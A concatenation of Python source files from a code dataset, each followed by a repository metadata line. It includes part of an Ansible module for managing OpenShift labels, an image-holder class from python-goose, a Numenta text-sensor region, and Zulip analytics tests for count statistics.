for label in self.labels:
cmd.append("{}={}".format(label['key'], label['value']))
# --overwrite for the case where we are updating existing labels
cmd.append("--overwrite")
return self.openshift_cmd(cmd)
def get(self):
'''return label information '''
result_dict = {}
label_list = []
if self.name:
result = self._get(resource=self.kind, rname=self.name, selector=self.selector)
if 'labels' in result['results'][0]['metadata']:
label_list.append(result['results'][0]['metadata']['labels'])
else:
label_list.append({})
else:
result = self._get(resource=self.kind, selector=self.selector)
for item in result['results'][0]['items']:
if 'labels' in item['metadata']:
label_list.append(item['metadata']['labels'])
else:
label_list.append({})
self.current_labels = label_list
result_dict['labels'] = self.current_labels
result_dict['item_count'] = len(self.current_labels)
result['results'] = result_dict
return result
def cmd_template(self):
''' boilerplate oc command for modifying lables on this object '''
# let's build the cmd with what we have passed in
cmd = ["label", self.kind]
if self.selector:
cmd.extend(["--selector", self.selector])
elif self.name:
cmd.extend([self.name])
return cmd
def add(self):
''' add labels '''
cmd = self.cmd_template()
for label in self.labels:
cmd.append("{}={}".format(label['key'], label['value']))
cmd.append("--overwrite")
return self.openshift_cmd(cmd)
def delete(self):
'''delete the labels'''
cmd = self.cmd_template()
for label in self.labels:
cmd.append("{}-".format(label['key']))
return self.openshift_cmd(cmd)
# pylint: disable=too-many-branches,too-many-return-statements
@staticmethod
def run_ansible(params, check_mode=False):
''' run the idempotent ansible code
prams comes from the ansible portion of this module
check_mode: does the module support check mode. (module.check_mode)
'''
oc_label = OCLabel(params['name'],
params['namespace'],
params['kind'],
params['kubeconfig'],
params['labels'],
params['selector'],
verbose=params['debug'])
state = params['state']
name = params['name']
selector = params['selector']
api_rval = oc_label.get()
#####
# Get
#####
if state == 'list':
return {'changed': False, 'results': api_rval['results'], 'state': "list"}
#######
# Add
#######
if state == 'add':
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'add'"}
if not oc_label.all_user_labels_exist():
if check_mode:
return {'changed': False, 'msg': 'Would have performed an addition.'}
api_rval = oc_label.add()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "add"}
return {'changed': False, 'state': "add"}
########
# Delete
########
if state == 'absent':
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'absent'"}
if oc_label.any_label_exists():
if check_mode:
return {'changed': False, 'msg': 'Would have performed a delete.'}
api_rval = oc_label.delete()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "absent"}
return {'changed': False, 'state': "absent"}
if state == 'present':
########
# Update
########
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'present'"}
# if all the labels passed in don't already exist
# or if there are currently stored labels that haven't
# been passed in
if not oc_label.all_user_labels_exist() or \
oc_label.extra_current_labels():
if check_mode:
return {'changed': False, 'msg': 'Would have made changes.'}
api_rval = oc_label.replace()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_label.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "present"}
return {'changed': False, 'results': api_rval, 'state': "present"}
return {'failed': True,
'changed': False,
'results': 'Unknown state passed. %s' % state,
'state': "unknown"}
| apache-2.0 | 7,749,958,976,490,707,000 | 31.523973 | 94 | 0.520901 | false |
muggot/python-goose | goose/images/ImageExtractor.py | 1 | 1258 | # -*- coding: utf-8 -*-
"""\
This is a python port of "Goose" orignialy licensed to Gravity.com
under one or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.
Python port was written by Xavier Grangier for Recrutae
Gravity.com licenses this file
to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class LocallyStoredImage(object):
def __init__(self, imgSrc='', localFileName='',
linkhash='', bytes=long(0), fileExtension='', height=0, width=0):
self.imgSrc = imgSrc
self.localFileName = localFileName
self.linkhash = linkhash
self.bytes = bytes
self.fileExtension = fileExtension
self.height = height
self.width = width
| apache-2.0 | 7,027,247,018,022,876,000 | 34.942857 | 73 | 0.734499 | false |
BoltzmannBrain/nupic.research | htmresearch/regions/LanguageSensor.py | 2 | 8108 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import copy
import numpy
from collections import deque
from nupic.bindings.regions.PyRegion import PyRegion
class LanguageSensor(PyRegion):
"""
LanguageSensor (LS) is an extensible sensor for text data.
The LS obtains info from a file, csv or txt (not yet implemented).
An LS is essentially a shell containing two objects:
1. A DataSource object gets one record at a time. This record is returned
as a dict object by getNextRecordDict(). For example, a DataSource might
return:
{sample="Hello world!", labels=["Python"]}
2. An encoder from nupic.fluent/encoders
The DataSource and LanguageEncoder are supplied after the node is created,
not in the node itself.
"""
def __init__(self,
verbosity=0,
numCategories=1):
"""Create a node without an encoder or datasource."""
self.numCategories = numCategories
self.verbosity = verbosity
# These fields are set outside when building the region.
self.encoder = None
self.dataSource = None
self._outputValues = {}
self._iterNum = 0
self.queue = deque()
@classmethod
def getSpec(cls):
"""Return base spec for this region. See base class method for more info."""
spec = {
"description":"Sensor that reads text data records and encodes them for "
"an HTM network.",
"singleNodeOnly":True,
"outputs":{
"dataOut":{
"description":"Encoded text",
"dataType":"Real32",
"count":0,
"regionLevel":True,
"isDefaultOutput":True,
},
"categoryOut":{
"description":"Index of the current word's category.",
"dataType":"Real32",
"count":0,
"regionLevel":True,
"isDefaultOutput":False,
},
"resetOut":{
"description":"Boolean reset output.",
"dataType":"Real32",
"count":1,
"regionLevel":True,
"isDefaultOutput":False,
},
"sequenceIdOut":{
"description":"Sequence ID",
"dataType":'Real32',
"count":1,
"regionLevel":True,
"isDefaultOutput":False,
},
},
"inputs":{},
"parameters":{
"verbosity":{
"description":"Verbosity level",
"dataType":"UInt32",
"accessMode":"ReadWrite",
"count":1,
"constraints":"",
},
"numCategories":{
"description":("Total number of categories to expect from the "
"FileRecordStream"),
"dataType":"UInt32",
"accessMode":"ReadWrite",
"count":1,
"constraints":""},
},
"commands":{},
}
return spec
def initialize(self, inputs, outputs):
"""Initialize the node after the network is fully linked."""
if self.encoder is None:
raise Exception("Unable to initialize LanguageSensor -- "
"encoder has not been set")
def rewind(self):
"""Reset the sensor to the beginning of the data file."""
self._iterNum = 0
if self.dataSource is not None:
self.dataSource.rewind()
def populateCategoriesOut(self, categories, output):
"""
Populate the output array with the category indices.
Note: non-categories are represented with -1.
"""
if categories[0] is None:
# The record has no entry in category field.
output[:] = -1
else:
# Populate category output array by looping over the smaller of the
# output array (size specified by numCategories) and the record's number
# of categories.
[numpy.put(output, [i], cat)
for i, (_, cat) in enumerate(zip(output, categories))]
output[len(categories):] = -1
def compute(self, inputs, outputs):
"""
Get a record from the dataSource and encode it. The fields for inputs and
outputs are as defined in the spec above.
Expects the text data to be in under header "token" from the dataSource.
"""
if len(self.queue) > 0:
# Data has been added to the queue, so use it
data = self.queue.pop()
elif self.dataSource is None:
raise Exception("LanguageSensor: No data to encode: queue is empty "
"and the dataSource is None.")
else:
data = self.dataSource.getNextRecordDict()
# Keys in data that are not column headers from the data source are
# standard of RecordStreamIface objects
# Copy important data input fields over to outputs dict.
outputs["resetOut"][0] = data["_reset"]
outputs["sequenceIdOut"][0] = data["_sequenceId"]
self.populateCategoriesOut(data["_category"], outputs["categoryOut"])
self.encoder.encodeIntoArray(data["_token"], outputs["dataOut"])
if self.verbosity > 0:
print "LanguageSensor outputs:"
print "SeqID: ", outputs["sequenceIdOut"]
print "Categories out: ", outputs['categoryOut']
print "dataOut: ", outputs["dataOut"].nonzero()[0]
# Deep copy the outputs so self._outputValues doesn't point to the values
# used within the Network API
self._outputValues = {
field: copy.deepcopy(value) for field, value in outputs.iteritems()
}
self._outputValues["sourceOut"] = data["_token"]
self._iterNum += 1
def addDataToQueue(self, token, categoryList, sequenceId, reset=0):
"""
Add the given data item to the sensor's internal queue. Calls to compute
will cause items in the queue to be dequeued in FIFO order.
@param token (str) The text token
@param categoryList (list) A list of one or more integer labels associated
with this token. If the list is [None], no
categories will be associated with this item.
@param sequenceId (int) An integer ID associated with this token and its
sequence (document).
@param reset (int) Should be 0 or 1. resetOut will be set to this
value when this item is computed.
"""
self.queue.appendleft ({
"_token": token,
"_category": categoryList,
"_sequenceId": sequenceId,
"_reset": reset
})
def getOutputValues(self, outputName):
"""Return the region's values for outputName.
"""
return self._outputValues[outputName]
def getOutputElementCount(self, name):
"""Returns the width of dataOut."""
if name == "resetOut" or name == "sequenceIdOut":
print ("WARNING: getOutputElementCount should not have been called with "
"{}.".format(name))
return 1
elif name == "dataOut":
if self.encoder == None:
raise Exception("Network requested output element count for {} on a "
"LanguageSensor node, but the encoder has not been set."
.format(name))
return self.encoder.getWidth()
elif name == "categoryOut":
return self.numCategories
else:
raise Exception("Unknown output {}.".format(name))
| agpl-3.0 | -783,225,662,559,630,500 | 31.562249 | 80 | 0.609521 | false |
blaze225/zulip | analytics/tests/test_counts.py | 2 | 31188 | from __future__ import absolute_import
from django.db import models
from django.db.models import Sum
from django.test import TestCase
from django.utils import timezone
from analytics.lib.counts import CountStat, COUNT_STATS, process_count_stat, \
zerver_count_user_by_realm, zerver_count_message_by_user, \
zerver_count_message_by_stream, zerver_count_stream_by_realm, \
do_fill_count_stat_at_hour, do_increment_logging_stat, ZerverCountQuery, \
LoggingCountStat, do_aggregate_to_summary_table
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, FillState, installation_epoch
from zerver.lib.actions import do_create_user, do_deactivate_user, \
do_activate_user, do_reactivate_user
from zerver.models import Realm, UserProfile, Message, Stream, Recipient, \
Huddle, Client, get_user_profile_by_email, get_client
from datetime import datetime, timedelta
from six.moves import range
from typing import Any, Dict, List, Optional, Text, Tuple, Type, Union
class AnalyticsTestCase(TestCase):
MINUTE = timedelta(seconds = 60)
HOUR = MINUTE * 60
DAY = HOUR * 24
TIME_ZERO = datetime(1988, 3, 14).replace(tzinfo=timezone.utc)
TIME_LAST_HOUR = TIME_ZERO - HOUR
def setUp(self):
# type: () -> None
self.default_realm = Realm.objects.create(
string_id='realmtest', name='Realm Test',
domain='test.analytics', date_created=self.TIME_ZERO - 2*self.DAY)
# used to generate unique names in self.create_*
self.name_counter = 100
# used as defaults in self.assertCountEquals
self.current_property = None # type: Optional[str]
# Lightweight creation of users, streams, and messages
def create_user(self, **kwargs):
# type: (**Any) -> UserProfile
self.name_counter += 1
defaults = {
'email': 'user%[email protected]' % (self.name_counter,),
'date_joined': self.TIME_LAST_HOUR,
'full_name': 'full_name',
'short_name': 'short_name',
'pointer': -1,
'last_pointer_updater': 'seems unused?',
'realm': self.default_realm,
'api_key': '42'}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
return UserProfile.objects.create(**kwargs)
def create_stream_with_recipient(self, **kwargs):
# type: (**Any) -> Tuple[Stream, Recipient]
self.name_counter += 1
defaults = {'name': 'stream name %s' % (self.name_counter,),
'realm': self.default_realm,
'date_created': self.TIME_LAST_HOUR}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
stream = Stream.objects.create(**kwargs)
recipient = Recipient.objects.create(type_id=stream.id, type=Recipient.STREAM)
return stream, recipient
def create_huddle_with_recipient(self, **kwargs):
# type: (**Any) -> Tuple[Huddle, Recipient]
self.name_counter += 1
defaults = {'huddle_hash': 'hash%s' % (self.name_counter,)}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
huddle = Huddle.objects.create(**kwargs)
recipient = Recipient.objects.create(type_id=huddle.id, type=Recipient.HUDDLE)
return huddle, recipient
def create_message(self, sender, recipient, **kwargs):
# type: (UserProfile, Recipient, **Any) -> Message
defaults = {
'sender': sender,
'recipient': recipient,
'subject': 'subject',
'content': 'hi',
'pub_date': self.TIME_LAST_HOUR,
'sending_client': get_client("website")}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
return Message.objects.create(**kwargs)
# kwargs should only ever be a UserProfile or Stream.
def assertCountEquals(self, table, value, property=None, subgroup=None,
end_time=TIME_ZERO, realm=None, **kwargs):
# type: (Type[BaseCount], int, Optional[Text], Optional[Text], datetime, Optional[Realm], **models.Model) -> None
if property is None:
property = self.current_property
queryset = table.objects.filter(property=property, end_time=end_time).filter(**kwargs)
if table is not InstallationCount:
if realm is None:
realm = self.default_realm
queryset = queryset.filter(realm=realm)
if subgroup is not None:
queryset = queryset.filter(subgroup=subgroup)
self.assertEqual(queryset.values_list('value', flat=True)[0], value)
def assertTableState(self, table, arg_keys, arg_values):
# type: (Type[BaseCount], List[str], List[List[Union[int, str, bool, datetime, Realm, UserProfile, Stream]]]) -> None
"""Assert that the state of a *Count table is what it should be.
Example usage:
self.assertTableState(RealmCount, ['property', 'subgroup', 'realm'],
[['p1', 4], ['p2', 10, self.alt_realm]])
table -- A *Count table.
arg_keys -- List of columns of <table>.
arg_values -- List of "rows" of <table>.
Each entry of arg_values (e.g. ['p1', 4]) represents a row of <table>.
The i'th value of the entry corresponds to the i'th arg_key, so e.g.
the first arg_values entry here corresponds to a row of RealmCount
with property='p1' and subgroup=10.
Any columns not specified (in this case, every column of RealmCount
other than property and subgroup) are either set to default values,
or are ignored.
The function checks that every entry of arg_values matches exactly one
row of <table>, and that no additional rows exist. Note that this means
checking a table with duplicate rows is not supported.
"""
defaults = {
'property': self.current_property,
'subgroup': None,
'end_time': self.TIME_ZERO}
for values in arg_values:
kwargs = {} # type: Dict[str, Any]
for i in range(len(values)):
kwargs[arg_keys[i]] = values[i]
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
if table is not InstallationCount:
if 'realm' not in kwargs:
if 'user' in kwargs:
kwargs['realm'] = kwargs['user'].realm
elif 'stream' in kwargs:
kwargs['realm'] = kwargs['stream'].realm
else:
kwargs['realm'] = self.default_realm
self.assertEqual(table.objects.filter(**kwargs).count(), 1)
self.assertEqual(table.objects.count(), len(arg_values))
class TestProcessCountStat(AnalyticsTestCase):
def make_dummy_count_stat(self, current_time):
# type: (datetime) -> CountStat
dummy_query = """INSERT INTO analytics_realmcount (realm_id, property, end_time, value)
VALUES (1, 'test stat', '%(end_time)s', 22)""" % {'end_time': current_time}
stat = CountStat('test stat', ZerverCountQuery(Recipient, UserCount, dummy_query),
{}, None, CountStat.HOUR, False)
return stat
def assertFillStateEquals(self, end_time, state=FillState.DONE, property=None):
# type: (datetime, int, Optional[Text]) -> None
stat = self.make_dummy_count_stat(end_time)
if property is None:
property = stat.property
fill_state = FillState.objects.filter(property=property).first()
self.assertEqual(fill_state.end_time, end_time)
self.assertEqual(fill_state.state, state)
def test_process_stat(self):
# type: () -> None
# process new stat
current_time = installation_epoch() + self.HOUR
stat = self.make_dummy_count_stat(current_time)
property = stat.property
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# dirty stat
FillState.objects.filter(property=property).update(state=FillState.STARTED)
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# clean stat, no update
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# clean stat, with update
current_time = current_time + self.HOUR
stat = self.make_dummy_count_stat(current_time)
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 2)
# This tests the is_logging branch of the code in do_delete_counts_at_hour.
# It is important that do_delete_counts_at_hour not delete any of the collected
# logging data!
def test_process_logging_stat(self):
# type: () -> None
end_time = self.TIME_ZERO
user_stat = LoggingCountStat('user stat', UserCount, CountStat.DAY)
stream_stat = LoggingCountStat('stream stat', StreamCount, CountStat.DAY)
realm_stat = LoggingCountStat('realm stat', RealmCount, CountStat.DAY)
user = self.create_user()
stream = self.create_stream_with_recipient()[0]
realm = self.default_realm
UserCount.objects.create(
user=user, realm=realm, property=user_stat.property, end_time=end_time, value=5)
StreamCount.objects.create(
stream=stream, realm=realm, property=stream_stat.property, end_time=end_time, value=5)
RealmCount.objects.create(
realm=realm, property=realm_stat.property, end_time=end_time, value=5)
# Normal run of process_count_stat
for stat in [user_stat, stream_stat, realm_stat]:
process_count_stat(stat, end_time)
self.assertTableState(UserCount, ['property', 'value'], [[user_stat.property, 5]])
self.assertTableState(StreamCount, ['property', 'value'], [[stream_stat.property, 5]])
self.assertTableState(RealmCount, ['property', 'value'],
[[user_stat.property, 5], [stream_stat.property, 5], [realm_stat.property, 5]])
self.assertTableState(InstallationCount, ['property', 'value'],
[[user_stat.property, 5], [stream_stat.property, 5], [realm_stat.property, 5]])
# Change the logged data and mark FillState as dirty
UserCount.objects.update(value=6)
StreamCount.objects.update(value=6)
RealmCount.objects.filter(property=realm_stat.property).update(value=6)
FillState.objects.update(state=FillState.STARTED)
# Check that the change propagated (and the collected data wasn't deleted)
for stat in [user_stat, stream_stat, realm_stat]:
process_count_stat(stat, end_time)
self.assertTableState(UserCount, ['property', 'value'], [[user_stat.property, 6]])
self.assertTableState(StreamCount, ['property', 'value'], [[stream_stat.property, 6]])
self.assertTableState(RealmCount, ['property', 'value'],
[[user_stat.property, 6], [stream_stat.property, 6], [realm_stat.property, 6]])
self.assertTableState(InstallationCount, ['property', 'value'],
[[user_stat.property, 6], [stream_stat.property, 6], [realm_stat.property, 6]])
class TestCountStats(AnalyticsTestCase):
def setUp(self):
# type: () -> None
super(TestCountStats, self).setUp()
# This tests two things for each of the queries/CountStats: Handling
# more than 1 realm, and the time bounds (time_start and time_end in
# the queries).
self.second_realm = Realm.objects.create(
string_id='second-realm', name='Second Realm',
domain='second.analytics', date_created=self.TIME_ZERO-2*self.DAY)
for minutes_ago in [0, 1, 61, 60*24+1]:
creation_time = self.TIME_ZERO - minutes_ago*self.MINUTE
user = self.create_user(email='user-%[email protected]' % (minutes_ago,),
realm=self.second_realm, date_joined=creation_time)
recipient = self.create_stream_with_recipient(
name='stream %s' % (minutes_ago,), realm=self.second_realm,
date_created=creation_time)[1]
self.create_message(user, recipient, pub_date=creation_time)
self.hourly_user = UserProfile.objects.get(email='[email protected]')
self.daily_user = UserProfile.objects.get(email='[email protected]')
# This realm should not show up in the *Count tables for any of the
# messages_* CountStats
self.no_message_realm = Realm.objects.create(
string_id='no-message-realm', name='No Message Realm',
domain='no.message', date_created=self.TIME_ZERO-2*self.DAY)
self.create_user(realm=self.no_message_realm)
self.create_stream_with_recipient(realm=self.no_message_realm)
# This huddle should not show up anywhere
self.create_huddle_with_recipient()
def test_active_users_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['active_users:is_bot:day']
self.current_property = stat.property
# To be included
self.create_user(is_bot=True)
self.create_user(is_bot=True, date_joined=self.TIME_ZERO-25*self.HOUR)
self.create_user(is_bot=False)
# To be excluded
self.create_user(is_active=False)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, 'true'], [1, 'false'],
[3, 'false', self.second_realm],
[1, 'false', self.no_message_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[2, 'true'], [5, 'false']])
self.assertTableState(UserCount, [], [])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:is_bot:hour']
self.current_property = stat.property
bot = self.create_user(is_bot=True)
human1 = self.create_user()
human2 = self.create_user()
recipient_human1 = Recipient.objects.create(type_id=human1.id, type=Recipient.PERSONAL)
recipient_stream = self.create_stream_with_recipient()[1]
recipient_huddle = self.create_huddle_with_recipient()[1]
self.create_message(bot, recipient_human1)
self.create_message(bot, recipient_stream)
self.create_message(bot, recipient_huddle)
self.create_message(human1, recipient_human1)
self.create_message(human2, recipient_human1)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[1, 'false', human1], [1, 'false', human2], [3, 'true', bot],
[1, 'false', self.hourly_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, 'false'], [3, 'true'], [1, 'false', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[3, 'false'], [3, 'true']])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_by_message_type(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:message_type:day']
self.current_property = stat.property
# Nothing currently in this stat that is bot related, but so many of
# the rest of our stats make the human/bot distinction that one can
# imagine a later refactoring that will intentionally or
# unintentionally change this. So make one of our users a bot.
user1 = self.create_user(is_bot=True)
user2 = self.create_user()
user3 = self.create_user()
# private streams
recipient_stream1 = self.create_stream_with_recipient(invite_only=True)[1]
recipient_stream2 = self.create_stream_with_recipient(invite_only=True)[1]
self.create_message(user1, recipient_stream1)
self.create_message(user2, recipient_stream1)
self.create_message(user2, recipient_stream2)
# public streams
recipient_stream3 = self.create_stream_with_recipient()[1]
recipient_stream4 = self.create_stream_with_recipient()[1]
self.create_message(user1, recipient_stream3)
self.create_message(user1, recipient_stream4)
self.create_message(user2, recipient_stream3)
# huddles
recipient_huddle1 = self.create_huddle_with_recipient()[1]
recipient_huddle2 = self.create_huddle_with_recipient()[1]
self.create_message(user1, recipient_huddle1)
self.create_message(user2, recipient_huddle2)
# private messages
recipient_user1 = Recipient.objects.create(type_id=user1.id, type=Recipient.PERSONAL)
recipient_user2 = Recipient.objects.create(type_id=user2.id, type=Recipient.PERSONAL)
recipient_user3 = Recipient.objects.create(type_id=user3.id, type=Recipient.PERSONAL)
self.create_message(user1, recipient_user2)
self.create_message(user2, recipient_user1)
self.create_message(user3, recipient_user3)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[1, 'private_stream', user1],
[2, 'private_stream', user2],
[2, 'public_stream', user1],
[1, 'public_stream', user2],
[2, 'private_message', user1],
[2, 'private_message', user2],
[1, 'private_message', user3],
[1, 'public_stream', self.hourly_user],
[1, 'public_stream', self.daily_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[3, 'private_stream'], [3, 'public_stream'], [5, 'private_message'],
[2, 'public_stream', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'],
[[3, 'private_stream'], [5, 'public_stream'], [5, 'private_message']])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_to_recipients_with_same_id(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:message_type:day']
self.current_property = stat.property
user = self.create_user(id=1000)
user_recipient = Recipient.objects.create(type_id=user.id, type=Recipient.PERSONAL)
stream_recipient = self.create_stream_with_recipient(id=1000)[1]
huddle_recipient = self.create_huddle_with_recipient(id=1000)[1]
self.create_message(user, user_recipient)
self.create_message(user, stream_recipient)
self.create_message(user, huddle_recipient)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertCountEquals(UserCount, 2, subgroup='private_message')
self.assertCountEquals(UserCount, 1, subgroup='public_stream')
def test_messages_sent_by_client(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:client:day']
self.current_property = stat.property
user1 = self.create_user(is_bot=True)
user2 = self.create_user()
recipient_user2 = Recipient.objects.create(type_id=user2.id, type=Recipient.PERSONAL)
recipient_stream = self.create_stream_with_recipient()[1]
recipient_huddle = self.create_huddle_with_recipient()[1]
client2 = Client.objects.create(name='client2')
self.create_message(user1, recipient_user2, sending_client=client2)
self.create_message(user1, recipient_stream)
self.create_message(user1, recipient_huddle)
self.create_message(user2, recipient_user2, sending_client=client2)
self.create_message(user2, recipient_user2, sending_client=client2)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
client2_id = str(client2.id)
website_client_id = str(get_client('website').id) # default for self.create_message
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[2, website_client_id, user1],
[1, client2_id, user1], [2, client2_id, user2],
[1, website_client_id, self.hourly_user],
[1, website_client_id, self.daily_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, website_client_id], [3, client2_id],
[2, website_client_id, self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'],
[[4, website_client_id], [3, client2_id]])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_to_stream_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['messages_in_stream:is_bot:day']
self.current_property = stat.property
bot = self.create_user(is_bot=True)
human1 = self.create_user()
human2 = self.create_user()
recipient_human1 = Recipient.objects.create(type_id=human1.id, type=Recipient.PERSONAL)
stream1, recipient_stream1 = self.create_stream_with_recipient()
stream2, recipient_stream2 = self.create_stream_with_recipient()
# To be included
self.create_message(human1, recipient_stream1)
self.create_message(human2, recipient_stream1)
self.create_message(human1, recipient_stream2)
self.create_message(bot, recipient_stream2)
self.create_message(bot, recipient_stream2)
# To be excluded
self.create_message(human2, recipient_human1)
self.create_message(bot, recipient_human1)
recipient_huddle = self.create_huddle_with_recipient()[1]
self.create_message(human1, recipient_huddle)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(StreamCount, ['value', 'subgroup', 'stream'],
[[2, 'false', stream1], [1, 'false', stream2], [2, 'true', stream2],
# "hourly" and "daily" stream, from TestCountStats.setUp
[1, 'false', Stream.objects.get(name='stream 1')],
[1, 'false', Stream.objects.get(name='stream 61')]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[3, 'false'], [2, 'true'], [2, 'false', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[5, 'false'], [2, 'true']])
self.assertTableState(UserCount, [], [])
class TestDoAggregateToSummaryTable(AnalyticsTestCase):
# do_aggregate_to_summary_table is mostly tested by the end to end
# nature of the tests in TestCountStats. But want to highlight one
# feature important for keeping the size of the analytics tables small,
# which is that if there is no relevant data in the table being
# aggregated, the aggregation table doesn't get a row with value 0.
def test_no_aggregated_zeros(self):
# type: () -> None
stat = LoggingCountStat('test stat', UserCount, CountStat.HOUR)
do_aggregate_to_summary_table(stat, self.TIME_ZERO)
self.assertFalse(RealmCount.objects.exists())
self.assertFalse(InstallationCount.objects.exists())
class TestDoIncrementLoggingStat(AnalyticsTestCase):
def test_table_and_id_args(self):
# type: () -> None
# For realms, streams, and users, tests that the new rows are going to
# the appropriate *Count table, and that using a different zerver_object
# results in a new row being created
self.current_property = 'test'
second_realm = Realm.objects.create(string_id='moo', name='moo', domain='moo')
stat = LoggingCountStat('test', RealmCount, CountStat.DAY)
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
do_increment_logging_stat(second_realm, stat, None, self.TIME_ZERO)
self.assertTableState(RealmCount, ['realm'], [[self.default_realm], [second_realm]])
user1 = self.create_user()
user2 = self.create_user()
stat = LoggingCountStat('test', UserCount, CountStat.DAY)
do_increment_logging_stat(user1, stat, None, self.TIME_ZERO)
do_increment_logging_stat(user2, stat, None, self.TIME_ZERO)
self.assertTableState(UserCount, ['user'], [[user1], [user2]])
stream1 = self.create_stream_with_recipient()[0]
stream2 = self.create_stream_with_recipient()[0]
stat = LoggingCountStat('test', StreamCount, CountStat.DAY)
do_increment_logging_stat(stream1, stat, None, self.TIME_ZERO)
do_increment_logging_stat(stream2, stat, None, self.TIME_ZERO)
self.assertTableState(StreamCount, ['stream'], [[stream1], [stream2]])
def test_frequency(self):
# type: () -> None
times = [self.TIME_ZERO - self.MINUTE*i for i in [0, 1, 61, 24*60+1]]
stat = LoggingCountStat('day test', RealmCount, CountStat.DAY)
for time_ in times:
do_increment_logging_stat(self.default_realm, stat, None, time_)
stat = LoggingCountStat('hour test', RealmCount, CountStat.HOUR)
for time_ in times:
do_increment_logging_stat(self.default_realm, stat, None, time_)
self.assertTableState(RealmCount, ['value', 'property', 'end_time'],
[[3, 'day test', self.TIME_ZERO],
[1, 'day test', self.TIME_ZERO - self.DAY],
[2, 'hour test', self.TIME_ZERO],
[1, 'hour test', self.TIME_LAST_HOUR],
[1, 'hour test', self.TIME_ZERO - self.DAY]])
def test_get_or_create(self):
# type: () -> None
stat = LoggingCountStat('test', RealmCount, CountStat.HOUR)
# All these should trigger the create part of get_or_create.
# property is tested in test_frequency, and id_args are tested in test_id_args,
# so this only tests a new subgroup and end_time
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_ZERO)
do_increment_logging_stat(self.default_realm, stat, 'subgroup2', self.TIME_ZERO)
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_LAST_HOUR)
self.current_property = 'test'
self.assertTableState(RealmCount, ['value', 'subgroup', 'end_time'],
[[1, 'subgroup1', self.TIME_ZERO], [1, 'subgroup2', self.TIME_ZERO],
[1, 'subgroup1', self.TIME_LAST_HOUR]])
# This should trigger the get part of get_or_create
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_ZERO)
